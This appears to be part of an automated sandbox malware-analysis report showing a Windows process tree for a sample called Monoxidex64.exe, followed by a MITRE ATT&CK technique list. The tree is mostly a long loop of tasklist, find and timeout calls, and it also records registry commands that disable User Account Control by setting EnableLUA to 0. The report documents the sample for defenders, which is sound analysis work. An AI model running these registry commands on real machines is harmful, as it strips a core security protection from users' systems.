    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7088
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6856
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2760
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7076
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7136
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7024
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1200
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:712
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1448
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4092
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4816
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1808
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6812
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6792
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3940
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2456
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3416
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4604
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5084
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6100
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3912
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5680
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:2152
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3116
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6388
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6252
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5592
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6568
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5744
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6884
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6204
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6852
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5244
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6720
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5164
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6212
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6460
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:780
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5924
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5352
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6940
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7056
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5600
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5128
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6928
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6996
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6948
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4768
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5480
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:7088
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:856
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2868
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5344
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:752
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6656
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5092
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:944
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2992
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6084
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1200
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5620
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6736
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6608
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6840
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3436
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:832
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5468
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5132
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4992
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:552
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5968
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4268
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:324
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6688
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6100
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3912
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1368
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1256
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4276
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:984
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6260
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3556
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5232
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2424
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5636
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4572
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5908
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6852
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6180
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1056
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5428
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:312
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6444
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3192
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5276
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6580
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5316
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6112
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5256
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6020
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4760
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6984
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:7052
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:424
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2868
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5344
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:7120
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3560
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6896
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5464
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2472
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5032
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2116
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6564
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2020
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1880
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3472
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3548
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3452
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5468
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:664
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:552
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4308
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4536
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5304
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4128
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6468
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6440
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
      4⤵
      PID:6296
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
        5⤵
        Modifies registry key
        
        PID:7016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:6940
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:7056

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6972
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sharedfiles\linksharedfiles\Monoxidex64.exe.vir"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1820
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2076
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6231E5978660C516C8ABAB504EFC647C --mojo-platform-channel-handle=1756 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5712
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BF7870E3CE17F1176445D9431CF7D6BC --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BF7870E3CE17F1176445D9431CF7D6BC --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:2444
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=47A3A2B5B403CFD3B2B063950EAE92CD --mojo-platform-channel-handle=2348 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:6100
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1B3216D5E3C62509171C328906A59865 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:1052
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FB43F5BD9EB45092368A451C24739CE2 --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4060

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004E0
1⤵
PID:5200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery